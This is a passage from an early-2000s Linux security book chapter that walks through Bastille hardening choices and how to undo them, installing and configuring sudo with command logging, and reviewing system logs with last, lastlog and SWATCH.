download and install the updated No +RPMs? +Module 3: FilePermissions.pm +1. Would you like to set more restrictive permissions on Yes +the administration utilities? +2. Would you like to disable SUID status for mount/ No +umount? +3. Would you like to disable SUID status for ping? Yes +4. Would you like to disable SUID status for dump and No +restore? +5. Would you like to disable SUID status for cardctl? No +6. Would you like to disable SUID status for at? No +7. Would you like to disable SUID status for DOSEMU? No +8. Would you like to disable SUID status for news server No +tools? +9. Would you like to disable SUID status for printing No +utilities? +10. Would you like to disable SUID status for the r-tools? No +11. Would you like to disable SUID status for usernetctl? No +12. Would you like to disable SUID status for traceroute? Yes +Module 4: AccountSecurity.pm +1. Would you like to set up a second UID 0 account? No +1a. What should we name the second UID 0 account? admin +2. May we take strong steps to disallow the dangerous No +r-protocols? +3. Would you like to enforce password aging? Yes +4. Would you like to create a nonroot user account? Yes +4a. What should we name your nonroot account? dave +5. Would you like to restrict the use of cron to adminis- No +trator accounts? +No +Continued +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 70 +70 Chapter 2 • Hardening the Operating System +Table 2.5 Continued +Question Choice +Module 5: BootSecurity.pm +1. Would you like to password protect the LILO prompt? No +1a. Enter LILO password, please. (Blank) +2. Would you like to reduce the LILO delay time to zero? No +3. Do you ever boot Linux from the hard drive? Yes +4. Would you like to write the LILO changes to a boot No +floppy? +4a. Floppy drive device name. fd0 +5. Would you like to disable CTRL-ALT-DELETE rebooting? No +6. Would you like to password protect single-user mode? Yes +Module 6: SecureInetd.pm +1. Would you like to modify inetd.conf and /etc/hosts No +.allow to optimize use of Wrappers? +2. Would you like to set sshd to accept connections only No +from a small list of IP addresses? +2a. IP addresses to accept SSH from: (Blank) +3. Would you like to make Authorized Use banners? Yes +Module 7: DisableUserTools.pm +1. Would you like to disable the compiler? No +Module 8: ConfigureMiscPAM.pm +1. Would you like to put limits on system resource usage? Yes +2. Should we restrict console access to a small group of +user accounts? No +2a. What accounts should be able to log in at console? +root +Module 9: Logging.pm +1. Would you like to add additional logging? No +2. Do you have a remote logging host? No +2a. What is the IP address of the machine you want to 127.0.0.1 +log to? +Continued +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 71 +Hardening the Operating System • Chapter 2 71 +Table 2.5 Continued +Question Choice +3. Would you like to set up process accounting? No +Module 10: MiscellaneousDaemons.pm +1. Would you like to disable apmd? No +2. Would you like to deactivate NFS and Samba? No +3. Would you like to disable atd? No +4. Would you like to disable PCMCIA services? No +5. Would you like to disable the DHCP daemon? No +6. Would you like to disable GPM? No +7. Would you like to disable the news server daemon? No +8. Would you like to deactivate the routing daemons? No +9. Would you like to deactivate NIS server and client No +programs? +10. Would you like to disable SNMPD? No +Module 11: Sendmail.pm +1. Do you want to leave sendmail running in daemon Yes +mode? +2. Would you like to run sendmail via cron to process No +the queue? +3. Would you like to disable the VRFY and EXPN send- No +mail commands? +Module 12: RemoteAccess.pm +1. Would you like to download and install SSH? No +Module 13: DNS.pm +1. Would you like to chroot named and set it to run as a No +nonroot user? +2. Would you like to deactivate named, at least for now? No +Module 14: Apache.pm +1. Would you like to deactivate the Apache Web server? No +2. Would you like to bind the Web server to listen only to No +the localhost? +Continued +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 72 +72 Chapter 2 • Hardening the Operating System +Table 2.5 Continued +Question Choice +3. Would you like to bind the Web server to a particular No +interface? +3a. Address to bind the Web server to? 127.0.0.1 +4. Would you like to deactivate the following of No +symbolic links? +5. Would you like to deactivate server-side includes? No +6. Would you like to disable CGI scripts, at least for No +now? +7. Would you like to disable indexes? No +Module 15: Printing.pm +1. Would you like to disable printing? No +Module 16: FTP.pm +1. Would you like to disable user privileges on the FTP No +daemon? +2. Would you like to disable anonymous download? No +9. Bastille asks if you wish to implement these changes,as shown in +Figure 2.13. +Figure 2.13 Implementing Bastille Changes +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 73 +Hardening the Operating System • Chapter 2 73 +10. Select Yes.The credits will appear.Press TAB to return to the prompt. +11. To test the changes you made to your system,enter the following +ping and traceroute commands as root.The commands should run +successfully. +ping www.bastille-linux.org +traceroute www.bastille-linux org +12. Create a password for the dave account you created in Bastille by entering: +passwd dave +Changing password for user dave +New UNIX password: +Retype new UNIX password: +passwd: all authentication tokens updated successfully +13. Log in as user dave.The “NOTICE TO USERS”authorization banner +will appear (the etc/motd file),warning that the computer system is for +authorized use only.The banner will appear when any user,including +users with SUID status,log on to the system. +14. Enter the ping and traceroute commands again as dave.The commands +should fail,because only users with SUID status are allowed to run these +commands.The error messages will appear as follows: +ping www.bastille-linux.org +/bin/ping: Permission denied +traceroute www.bastille-linux.org +traceroute: command not found +15. You also implemented password aging to 180 days.Observe the changes +you made to the login.def file by entering: +cat /etc/login.defs | less +Press any key to display the next page.Press q to access the prompt. +16. You applied limits to system resources by limiting individual file size to +40MB,limiting individual users to 150 processes,and configuring the +allowable core files number to zero.Observe the changes you made to +the limits.conf file by entering: +cat /etc/security/limits.conf | less +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 74 +74 Chapter 2 • Hardening the Operating System +Press any key to display the next page.Press q to access the prompt. +17. Log in as root so you can add an account in the next step. +18. You password protected single-user mode.If a user gains access to your +physical system,he or she must enter a password to enter single-user +mode.This will keep anyone from accessing single-user mode,giving +him or her root access and no one else access to the machine.The pass- +word is the root password.To test this action,follow these steps: +19. Reboot the system. +20. At the lilo prompt,enter: +linux init 1 +21. The following instructions will appear.Enter your root password as +requested: +Telling INIT to go to single user mode. +INIT: Going single user +Give root password for maintenance +(or type Control-D for normal startup): ******** +22. You will access single-user mode,but only if you enter the root pass- +word.Access run-level 3 by entering: +init 3 +Undoing Bastille Changes +At the time of this writing,a reliable automatic undo feature did not exist in +Bastille.To undo the changes,you can run through the configuration questions +again and select different answers.There are two other options.There is a Perl +script named Undo.pl in the Bastille directory that is designed to undo all +changes except for RPM installations.There is also a backup directory located at +/root/Bastille/undo/backup that contains all the original system files that Bastille +modified.The backup directory structure is the same as the system’s directory,so +you can manually replace the files fairly easily. +You cannot undo your Bastille configurations by simply removing Bastille.If +you do this,your changes will still be written to their specific files.If you want to +remove the program and your settings,you must undo your changes,and then +remove the Bastille directory. +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 75 +Hardening the Operating System • Chapter 2 75 +The following steps demonstrate three ways to undo the changes that you +implemented in Table 2.5. +1. One method to undo Bastille configurations is to run through the con- +figuration questions again and select different answers.If you choose this +method,access the Bastille directory and enter: +./InteractiveBastille.pl +2. Run through the selection from Table 2.5 again,but replace several of +the “Yes”configurations with a “No”answer,as shown in Table 2.6. +Table 2.6 Undoing Bastille Configurations +Question Choice +Module 3: FilePermissions.pm +1. Would you like to set more restrictive permissions on No +the administration utilities? +3. Would you like to disable SUID status for ping? No +12. Would you like to disable SUID status for traceroute? No +Module 4: AccountSecurity.pm +3. Would you like to enforce password aging? No +4. Would you like to create a nonroot user account? No +Module 5: BootSecurity.pm +6. Would you like to password protect single-user mode? No +Module 6: SecureInetd.pm +3. Would you like to make Authorized Use banners? No +Module 8: ConfigureMiscPAM.pm +1. Would you like to put limits on system resource usage? No +3. Bastille asks if you wish to implement these changes.Select Yes.The +credits will appear.Press TAB to return to the prompt. +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 76 +76 Chapter 2 • Hardening the Operating System +4. The dave account you created will not be deleted because you only +specified that you did not want to create a new account during the +undo process.To delete the dave account,enter: +userdel –r dave +The command will remove all entries for dave in the system account +files and the dave account’s home directory. +5. The Authorized Use banner may still appear at logon.To manually +delete the Authorized Use banner,delete the banner text in the +/etc/motd file,or replace the motd file with the backup file.The loca- +tion of the backup file is explained in step 7. +6. A second method to undo Bastille configurations is to run the automated +Perl script that will undo the changes.The script is named Undo.pl,and is +designed to undo all changes except for RPM installations.To run the +Undo.pl script,access the Bastille directory and enter: +./Undo +7. A third method to undo Bastille configurations is to manually remove +the changes.This can be done by replacing each file that was changed +with the backup files in the Bastille directory.The backup directory is +located at: +/root/Bastille/undo/backup +The backup files contain the original files before they were changed, +so the original configurations are intact.Bastille makes a backup file of +each file before the file is modified.A Bastille backup directory is shown +in Figure 2.14. +Figure 2.14 Bastille Backup Directory Example +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 77 +Hardening the Operating System • Chapter 2 77 +8. For example,to change password aging back to its default 99,999 days, +replace the login.defs file with the backup file.Enter the following: +cd /root/Bastille/undo/backup/etc/login.defs +cp logindefs /etc/login.defs +cp: overwrite ‘/etc/login.defs’? y +The backup file replaces the current file,thus returning the password +expiration configuration to its default setting. +As you can see,Bastille is a powerful security tool that helps you harden your +system.It is relatively simple to use,and can save administrators a great deal of +time because it automatically configures the required files for each selection. +Administrators do not have to manually write to each file,or disable services +individually.Bastille is recommended for any Unix system that offers services, +whether it is a LAN or Internet server. +Controlling and Auditing +Root Access with Sudo +Superuser Do (sudo) is an open source security tool that allows an administrator +to give specific users or groups the ability to run certain commands as root or as +another user.The program can also log commands and arguments entered by +specified system users.The developers of sudo state that the basic philosophy +(www.courtesan.com/sudo/readme.html) of the program is to “give as few privi- +leges as possible but still allow people to get their work done.”Sudo was first +released to the public in the summer of 1986,and Todd Miller of Courtesan +Consulting currently maintains the program and distributes it freely under a +BSD-style license.The Sudo Main Page is located at www.courtesan.com/sudo, +as shown in Figure 2.15. +The program is a command-line tool that operates one command at a time. +Table 2.7 lists several important features of sudo. +Table 2.7 Sudo Features +Feature Description +Command logging Commands and argument can be logged. +Commands entered can be traced to the user. +Ideal for system auditing. +Continued +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 78 +78 Chapter 2 • Hardening the Operating System +Table 2.7 Continued +Feature Description +Centralized logging of Sudo can be used with the system log daemon +multiple systems (syslog) to log all commands to a central host. +Command restrictions Each user or group of users can be limited to +what commands they are allowed to enter on +the system. +Ticketing system The ticketing system sets a time limit by +creating a ticket when a user logs on to sudo. +The ticket is valid for a configurable amount of +time. Each new command refreshes the ticket +for the predefined amount of time. The +default time is five minutes. +Centralized administration of The sudo configurations are written to the +multiple systems /etc/sudoers file. This file can be used on +multiple systems and allows administration +from a central host. The file is designed to +allow user privileges on a host-by-host basis. +Figure 2.15 Sudo Home Page +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 79 +Hardening the Operating System • Chapter 2 79 +Because sudo logs all commands run as root (or specified otherwise),many +administrators use it instead of using the root shell.This allows them to log their +own commands for troubleshooting and additional security. +The ticketing system is ideal because if the root user walks away from the +system while still logged in (a very bad idea),another user cannot access the +system simply because he or she has physical access to the keyboard. +After the ticket expires,users must log on to the system again.A shorter time +is recommended,such as the default five minutes.The ticketing system also allows +users to remove their ticket file. +System Requirements +To install and run sudo from the source distribution,you must have a system run- +ning Unix.Almost all versions of Unix support the sudo source distribution, +including almost all flavors of POSIX,BSD,and SYSV.You must also install the C +compiler and the make utility. +Sudo is known to run on the following Unix flavors:Auspex,SunOS,Solaris, +ISC,RISCos,SCO,HP-UX,Ultrix,IRIX,NEXTSTEP,DEC Unix,AIX, +ConvexOS,BSD/OS,OpenBSD,Linux,UnixWare,Pyramid,ATT,SINIX, +ReliantUNIX,NCR,Unicos,DG/UX,Dynix/ptx,DC-Osx,HI-UX/MPP, +SVR4,and NonStop-UX.It also runs on MacOSX Server.To see if your OS +version is compatible,visit www.courtesan.com/sudo/runson.html.In the fol- +lowing examples,the Linux 2.2.16 kernel (included with Red Hat Linux 7) will +be used on an i586 system. +The Sudo Command +The sudo command allows a user to execute a command as a superuser or +another user.All configurations for sudo are written to the /etc/sudoers file.The +sudoers file specifies whether that command is allowed by that particular user. +In order to use sudo,the user must have already supplied a username and +password.If a user attempts to run the command via sudo and that user is not in +the sudoers file,an e-mail is automatically sent to the administrator,indicating +that an unauthorized user is accessing the system. +Once a user logs in to sudo,a ticket is issued that is valid by default for five +minutes.A user can update the ticket by issuing the –v flag,which will validate +the ticket for another five minutes.The command is entered as follows: +sudo –v +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 80 +80 Chapter 2 • Hardening the Operating System +If an unauthorized user runs the -v flag,an e-mail will not be sent to the +administrator.The -v flag informs the unauthorized user that he or she is not a +valid user.If the user enters command via sudo anyway,an e-mail will then be +sent to the administrator. +Sudo logs login attempts,successful and unsuccessful,to the syslog(3) file by +default.However,this can be changed during sudo configuration.Some of the +command-line options listed in Table 2.8 are used by sudo. +Table 2.8 Selected Sudo Command Options +Option Option Name Description +-V Version Prints version number and exits. +-l List Lists the commands that are allowed and +denied by current user. +-h Help Prints usage message and exits. +-v Validate Updates the user’s ticket for a configured +amount of time (default is five minutes). If +required, the user must re-enter the user +password. +-k Kill Expires the user’s ticket. Completing this +option requires the user to re-enter the user +password to update the ticket. +-K Sure kill Removes the user’s ticket entirely. User must +log in with username and password after +running this option. +-u User Runs the specific command as the username +specified. The user specified can be any user +except root. If you want to enter a uid, +enter #uid instead of the username. +Downloading Sudo +Sudo can be downloaded from multiple sites,all specified at the sudo Web site +(www.courtesan.com/sudo).For this demonstration,I used version 1.6.3p6, +which is included on the companion CD (sudo-1.6.3p6.tar.gz).Other versions +should be similar.For sudo download locations (many exist) via FTP and HTTP, +visit the following Web addresses: +(cid:2) FTP www.courtesan.com/sudo/ftp.html +(cid:2) HTTP www.courtesan.com/sudo/www.html +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 81 +Hardening the Operating System • Chapter 2 81 +The master FTP and HTTP sites for sudo are located and maintained by +Courtesan Consulting at: +(cid:2) FTP ftp://ftp.courtesan.com/pub/sudo +(cid:2) HTTP www.courtesan.com/sudo/dist +Many distributions exist for the different Unix flavors.Download the version +specific to your system.For example,follow these steps to download sudo for +Red Hat Linux: +1. Access the sudo master http download site at www.courtesan.com/ +sudo/dist. +2. Download the latest version of sudo displayed at the bottom of the +directory.For example,in Figure 2.16,you will select sudo- +1.6.3p6.tar.gz.Later versions will function in this example. +Figure 2.16 Downloading Sudo +3. Download the tarball to any directory you choose.Unlike Bastille,you +are not required to run the program in the root directory only.Sudo has +been downloaded to the /root directory for this example. +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 82 +82 Chapter 2 • Hardening the Operating System +Installing Sudo +To install sudo,you must first download the specific sudo tarball.After download, +locate the directory where you downloaded sudo and follow these steps: +1. Access the directory where you downloaded sudo,and decompress the +tar file (your sudo version number will vary depending on the version of +sudo that you downloaded) by entering: +tar –zxvf sudo-1.6.3p6.tar.gz +2. A directory will be created,such as sudo-1.6.3p6. +3. Access the sudo directory by entering: +cd sudo-1.6.3p6 +4. To creates a makefile and config.h file that will allow you to configure +sudo,enter: +./configure +5. You can add options to the ./configure command to customize your +sudo installation.Simply append the options listed in Table 2.9 to your +./configure command.The entire list of options is available in the +/sudo/INSTALL file. +Table 2.9 Sudo ./configure Options +Default +Option Description (if applicable) +--bindir=DIR Sudo installed in DIR. EPREFIX/bin +--sbindir=DIR Visudo installed in DIR. EPREFIX/sbin +--sysconfdir=DIR Sudoers file installed in DIR. /etc +--mandir=DIR Man pages installed in DIR. PREFIX/man +--with-skey Support S/Key One Time n/a +Password (OTP). +--with-SecurID=DIR Support SecurID. DIR is the n/a +directory where sdiclient.a, +sdi_athd.h, sdconf.h, and +sdacmvls.h will be located. +Continued +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 83 +Hardening the Operating System • Chapter 2 83 +Table 2.9 Continued +Default +Option Description (if applicable) +--with-fwtk=DIR Support TIS Firewall Toolkit n/a +(FWTK) ‘authsrv’. DIR is the +base directory where the +compiled FWTK package +will be located. +--with-kerb4 Support Kerberos v4. n/a +Cygnus Network Security +(CNS) is the only tested +package. +--with-kerb5 Support Kerberos v5. For n/a +authentication, Kerberos +passphrases are used, not +the Kerberos cookie +scheme. MIT Kerberos V, +release 1.1 (will not work +with versions earlier than +1.1) is the only test +package, but CNS should +also work. +--disable-shadow Disable shadow passwords. Supported. Shadow +password used if it +exists. +--with-sudoers-uid Defines the UID (User ID) 0 +that owns the sudoers file. +Actually configured in the +makefile. +--with-sudoers-gid Defines the GUI (Group ID) n/a +that owns the sudoers file. +Actually configured in the +makefile. +--without-passwd Disables authentication n/a +using the passwd or +shadow file. Do not disable +this authentication method +unless you are using +another authentication +method. +Continued +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 84 +84 Chapter 2 • Hardening the Operating System +Table 2.9 Continued +Default +Option Description (if applicable) +--with-logging=TYPE Defines logging method. syslog +The types include syslog, +file, or both. syslog allows +centralized logging and is +recommended. +--with-logpath=PATH Defines the location of the Default is /var/log/ +sudo log file. sudo. If your system +does not have this +directory, it defaults +to /var/adm/sudo +.log or /usr/adm/ +sudo.log. +--with-mailto Defines the user account root +that sudo mail will be sent. +Mail usually indicates an +alert. +--with-mailsubject Defines the subject of the “*** SECURITY +sudo mail. information for +hostname***” +--with-runas-default=USER Defines the default user for root +the sudo command. By +default, sudo gives root +privileges if the –u flag is +not specified. +--with-passwd-tries=TRIES Defines the number of Three tries +password attempts given to +a user. +--with-timeout=MINUTES Defines the number of min- Five minutes. +utes before another sudo Configure minutes +password is required to zero and sudo +will always request +a password. +--with-password- Defines the number of min- Five minutes. +timeout=MINUTES utes that sudo waits before Configure minutes +the sudo password prompt to zero for no pass- +times out. word timeout. +Continued +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 85 +Hardening the Operating System • Chapter 2 85 +Table 2.9 Continued +Default +Option Description (if applicable) +--with-editor=PATH Defines the default editor vi system path +path used by visudo. You +can also list several editors +in a colon-separated list. +visudo checks the USER +environment variable and +selects the defined one. It +can also select the first +editor that is installed on +the list. +6. You can also edit makefile to change the default paths for installation,as +well as the other configurations listed in Table 2.8.If you require this +change,open makefile in a text editor.For example,enter: +vi Makefile +7. Locate the “Where to install things...”section of makefile,as shown in +Figure 2.17. +Figure 2.17 Sudo Makefile +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 86 +86 Chapter 2 • Hardening the Operating System +8. Change the default paths if necessary.For this example,we recommend +that you use the default paths. +9. Quit the file.If you use the vi text editor,enter: +:q +10. (Optional) You can also change the default installation paths when you +run the ./configure command (you ran the configure command in a +previous step).To do this,enter an option after the command.For +example,by default the sudoers file is installed in the /etc directory.You +can change this location by entering: +./configure --sysconfdir=DIR +where DIR is the new installation directory. +11. To compile sudo,run the make command by entering: +make +12. (Optional) You will probably need GNU if you install sudo in a direc- +tory other than the source file directory.If you have errors during instal- +lation,read the TROUBLESHOOTING and PORTING files. +13. To install sudo,you must be the root user.Run the make install com- +mand to install the man pages,visudo,and a basic sudoers file by +entering: +make install +NOTE +Any existing sudoers file will not be overwritten. +14. You have installed sudo.The next section explains how to configure it to +suit your system’s needs. +Configuring Sudo +To configure sudo,you must edit the %/sudo-1.6.3p6/sudoers file.The sudoers file +defines which users are allowed to execute what commands.Only the root user is +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 87 +Hardening the Operating System • Chapter 2 87 +allowed to edit the file,and it must be edited with the visudo command.A +sample.sudoers file is included in the sudo directory,and is shown in Figure 2.18. +Figure 2.18 Sample.Sudoers File +The visudo command opens the sudoers file,by default,in the vi text editor. +The vi commands are used to edit and write the file.You can change the default +text editor used by visudo using the compile time option.Visudo uses the +EDITOR environment variable.The visudo command performs the following +tasks when editing the sudoers file: +(cid:2) Checks for parse errors Visudo will not save any changes if a syntax +error exists.It will state the line number of the error and prompt you for +guidance.You will be offered a “What Now?”prompt and three choices: +“e”to re-edit the file,“x”to exit without saving,and “Q”to quit and +save changes.A syntax error result is shown in Figure 2.19. +NOTE +If a syntax error exists in the sudoers file and you choose Q to quit and +save the visudo changes, sudo will not run until the problem is corrected. +You must run visudo again, fix the problem, and save the file again. It is +recommended that you select e to attempt to fix the problem, or x to exit +without saving (if you are not sure of what went wrong). +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 88 +88 Chapter 2 • Hardening the Operating System +(cid:2) Prevents multiple edits to the file simultaneously If you attempt +to run visudo while the sudoers file is being edited,you will receive an +error message informing you to try again at a later time. +Figure 2.19 Visudo Parse Error +The sudoers file consists of two different types of entries,user specifications and +aliases.The following examples show you how to use user specifications,which +define which user is allowed to run what commands.Aliases are basically variables. +The sudoers file contains a root entry.The default sudoers file is shown in +Figure 2.20.The user privilege specification is listed as: +root ALL=(ALL) ALL +This configuration allows the root user to issue all commands. +Figure 2.20 Default Sudoers File Allowing the Root User Access to +All Commands +To allow other users to run commands as root,you must enter those users in +the sudoers file.You must also list the host on which they are allowed to run the +commands.Last,you must list the specific commands that those users are allowed +to run as root.In the following steps,you will create user bob and allow him to +run several commands as root using sudo on your system. +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 89 +Hardening the Operating System • Chapter 2 89 +1. Open the sudoers file by entering: +visudo +2. The sudoers file opens in vi.Locate the “User privilege specification” +section.After the root entry,enter the following (press i to insert text): +bob your-hostname = /sbin/ifconfig, /bin/kill, /bin/ls +This line allows user bob to run the ifconfig,kill,and ls commands +as root.Your screen should resemble Figure 2.21 (except the host name). +Figure 2.21 User Privilege Specification in Sudoers File +3. Press ESC to write and quit the file.Then,enter: +:wq +This command writes and quits the file using vi. +4. Now you must create user bob.Enter: +useradd bob +5. Create a password for user bob by entering: +passwd bob +Changing password for user bob +New UNIX password: +Retype new UNIX password: +passwd: all authentication tokens updated successfully +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 90 +90 Chapter 2 • Hardening the Operating System +NOTE +By default, all commands you list in sudoers will run as root unless you +specify otherwise. For example, bob could run commands as user +bugman if desired. You would enter: +bob your-hostname = (bugman) /sbin/ifconfig +In this case, the ifconfig command will run as user bugman. You can +allow bob to enter commands as several different users. +bob your-hostname = (bugman) /sbin/ifconfig, (root) /bin/kill, +/bin/ls +The kill and ls commands will run as root, while the ifconfig com- +mand runs as bugman. At the command line, bob will enter: +sudo –u bugman /sbin/ifconfig +Running Sudo +You have configured sudo to allow user bob root privileges for the ifconfig,kill, +and ls commands.When bob wants to run these commands,he must first enter +the sudo command,and then his password. +1. Log on as user bob. +2. To find out what commands bob has root access to,enter the following: +sudo –l +3. If this is your first time running sudo as user bob,a warning will display: +We trust you have received the usual lecture from the local +System Administrator. It usually boils down to these two things: +#1) Respect the privacy of others. +#2) Think before you type +4. A password prompt appears.Do not enter the root password.Enter bob’s +password. +Password: +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 91 +Hardening the Operating System • Chapter 2 91 +5. The commands that bob is allowed to run on this host are listed,as +shown in Figure 2.22. +Figure 2.22 Commands That User bob Can Run as Root +6. To test your sudo configurations,run an ifconfig option that requires +root permission without using sudo.Enter: +/sbin/ifconfig eth0 down +Permission is denied because bob is not allowed to deactivate the +system’s interface. +7. To deactivate the interface,bob must use sudo.Enter: +sudo /sbin/ifconfig eth0 down +You will be successful.Please note that sudo will ask for the bob’s +password if bob’s ticket has expired (the default is five minutes).If you +run this command within five minutes from the last,you will not be +prompted for a password. +8. Reactivate the interface.Enter: +sudo /sbin/ifconfig eth0 up +9. Next,restart one of the httpd processes using the kill command by +entering: +ps aux | grep httpd +10. Choose an Apache PID from the list that appears.(If Apache is not +installed,select a different service process to restart.) Enter: +kill –HUP [PID NUMBER] +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 92 +92 Chapter 2 • Hardening the Operating System +11. You are not allowed to restart the httpd process because you are not +root.You will receive the following result: +bash: kill: (PID NUMBER) – Not owner +12. Instead,use sudo to run the command as root by entering: +sudo kill –HUP (PID NUMBER) +You should be successful. +13. Next,you will list the root user directory as user bob using the ls com- +mand.Enter: +ls /root +Permission is denied because you are not root. +14. Again,use sudo to run the command as root: +sudo ls /root +Permission is granted and the root user’s directory is displayed. +15. To expire bob’s timestamp,enter the command sudo -k. Bob will have +to enter a password the next time he uses sudo. +No Password +In some situations,entering a password each time sudo is run is redundant +because the user has already logged on to the system.Sudo offers a way around +this monotonous task by using the NOPASSWD tag in the sudoers file. +1. To remove the password requirement in the sudoers file,log on as root +and enter: +visudo +2. The sudoers file opens in vi.Modify bob’s user privilege specification to +match the following (press i to insert text): +bob your-hostname = NOPASSWD: /sbin/ifconfig, /bin/kill, /bin/ls +3. Press ESC.Enter :wq to write and quit the file. +4. Log on as bob.Deactivate the interface using sudo: +sudo /sbin/ifconfig eth0 down +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 93 +Hardening the Operating System • Chapter 2 93 +You will not be prompted for your password and the command will +run as root. +5. Reactivate the interface.Enter: +sudo /sbin/ifconfig eth0 up +Sudo Logging +As mentioned previously,sudo logs which users run what commands.Logging +does not occur automatically.You must set up sudo and syslogd to log commands. +This involves two steps.First,you must create a sudo logfile in /var/log.Second, +you must configure syslog.conf to log sudo commands.The following steps show +you how to configure sudo logging. +1. Log on as root.Create a sudo log file in /var/log/.Enter: +touch /var/log/sudo +2. Next,you must add a line in the syslog.conf file to direct logging to +your sudo logging file.Open syslog.conf by entering the following: +vi /etc/syslog.conf +3. Enter the following line at the end of the syslog.conf file (press i to +insert text).If you installed Bastille earlier in this lesson,insert the line +before or after the Bastille insert.The white space must be created using +the TAB key,not the SPACEBAR. +local2.debug /var/log/sudo +4. This syslog.conf entry logs all successful and unsuccessful sudo com- +mands to the /var/log/sudo file.You can also log to a network host by +indicating the network host instead of a local directory.The syslog.conf +file is shown in Figure 2.23. +5. Press ESC to write and quit the file.Then,enter: +:wq +6. Since you have modified the syslog.conf file,you need to restart syslogd. +To send a HUP signal to syslogd,you must first know the syslogd pro- +cess identifier (PID).To identify the syslogd PID,enter: +ps aux | grep syslogd +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 94 +94 Chapter 2 • Hardening the Operating System +Figure 2.23 Editing the Syslog.conf File for Sudo Logging +7. The second column lists the PID number.The last column lists the pro- +cess using that PID.To restart syslogd,identify the PID number and +enter: +kill –HUP [PID NUMBER] +8. First,you will generate log entries for user bob.Log on as user bob. +9. Enter the following ifconfig commands while logged on as user bob: +sudo –l +sudo /sbin/ifconfig eth0 down +sudo /sbin/ifconfig eth0 up +10. Restart one of the httpd processes (or another process) using the kill +command by entering: +ps aux | grep httpd +11. Choose an Apache (httpd) PID from the list that appears.Enter: +sudo kill –HUP [PID NUMBER] +12. Now list the root user directory as user bob.Enter: +sudo ls /root +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 95 +Hardening the Operating System • Chapter 2 95 +13. Log on as root and view the sudo log file.All the sudo commands that +bob entered are listed,as shown in Figure 2.24. +Figure 2.24 Sudo Log File Displaying User bob’s Commands +14. You can log any root commands by simply typing sudo before each +command.For example,make sure that you are logged on as root and +enter the following commands (or any commands you choose): +sudo useradd susan +sudo passwd susan +sudo vi /hosts +15. Access and view the sudo log file by entering: +sudo cat /var/log/sudo +All root user entries are logged,including the cat command you just +entered,as shown in Figure 2.25. +Figure 2.25 Sudo Log File Displaying Root User Commands +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 96 +96 Chapter 2 • Hardening the Operating System +As you can see,sudo is extremely helpful for controlling and auditing root +access.It allows a system administrator to distribute root system tasks without dis- +tributing the root password.An administrator can control what root access is +needed for each user,and can customize system access based on those needs. +Sudo is used almost entirely by system administrators,and is a great way to +train new system administrators.New administrators can be given a new account +with only selected root privileges.The master administrator can then review the +work of the administrator in training. +This section discussed one of the many ways to use sudo;it focused primarily +on user specifications in the sudoers file.For more information on extending +sudo,such as using aliases,please consult the sudoers man file. +Managing Your Log Files +Another aspect of system security is managing your log files.By default,Linux +offer modest logging so that administrators can see who and what has accessed +their system.More logging is available (both more detail and logging on more +services),but Linux keeps it brief so that you don’t fill your hard disk with log +information.This section briefly discusses helpful commands and programs that +provide access to system logs. +Linux offers commands that allow administrators to access useful log files. +Two commands of interest are last and lastlog.The message file also offers useful +data for determining possible security breaches on your system. +The last command displays data such as who is logged on to the system,who +recently logged on,and when the system has rebooted.For example,you may +receive data such as the following: +root tty1 Fri May 25 13:53 still logged on +frank pts/0 209.113.84.112 Fri May 25 12:13 – 14:36 (02:22) +reboot system boot 2.2.12-20 Fri May 25 12:06 (04:18) +The lastlog command displays the users and services that have accounts on +your machine.It lists the last time each account logged in to the system,or if the +account has ever logged in.Each service in Linux is given an account.This is +very helpful because if a service logged in without your knowledge,a hacker may +be responsible.This would indicate that the hacker controls your system and is +currently exploiting it.It could also mean that another administrator started the +service without telling you. +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 97 +Hardening the Operating System • Chapter 2 97 +The messages file is a log file that displays a list of recent activity on the +system.For example,it lists if a password was changed and who changed it.It +identifies when a user session opens and closes.It also lists the time and data each +event took place.It can be viewed by entering the following command: +tail /var/log/messages +If you prefer a GUI to view your log files,a program called SWATCH (not +installed by default) allows an instant and real-time display for various log files.It +can view any log files you specify and is discussed in the next section. +The Linux logs should be checked frequently to determine if any security +violations have occurred on your system.Logs do not offer solutions,so you must +analyze the data and decide how to counteract the attack. +Using Logging Enhancers +Logging enhancers are tools that simplify logging by allowing logging informa- +tion to be filtered and often displaying logs in simplified formats.Many open +source logging programs exist to make system administration much easier. +Viewing text-based files with hundreds or thousands of entries can be burden- +some,especially if you are only looking for one specific error entry.Logging +enhancers can make logging a much more user-friendly experience,and greatly +expand and customize the information you need to log. +The next sections explain three popular logging services used by administra- +tors:SWATCH,scanlogd,and the next generation of syslogd (syslogd-ng). +SWATCH +Simple WATCHer or Simple WATCHdog (SWATCH) is an open source +package that allows administrators to efficiently monitor system activity.It can +monitor events on a system,or a large number of systems,by monitoring system +logs for specified events.SWATCH’S main function is to monitor messages +actively as they are written to a log files through the Unix syslog utility. +SWATCH requires Perl 5 to function. +SWATCH is efficient because it allows administrators to modify the +SWATCH configuration file (/etc/swatchrc) to filter logging entries and respond +to certain events.For example,SWATCH can monitor the system for bad login +attempts,and e-mail the administrator whenever this failed 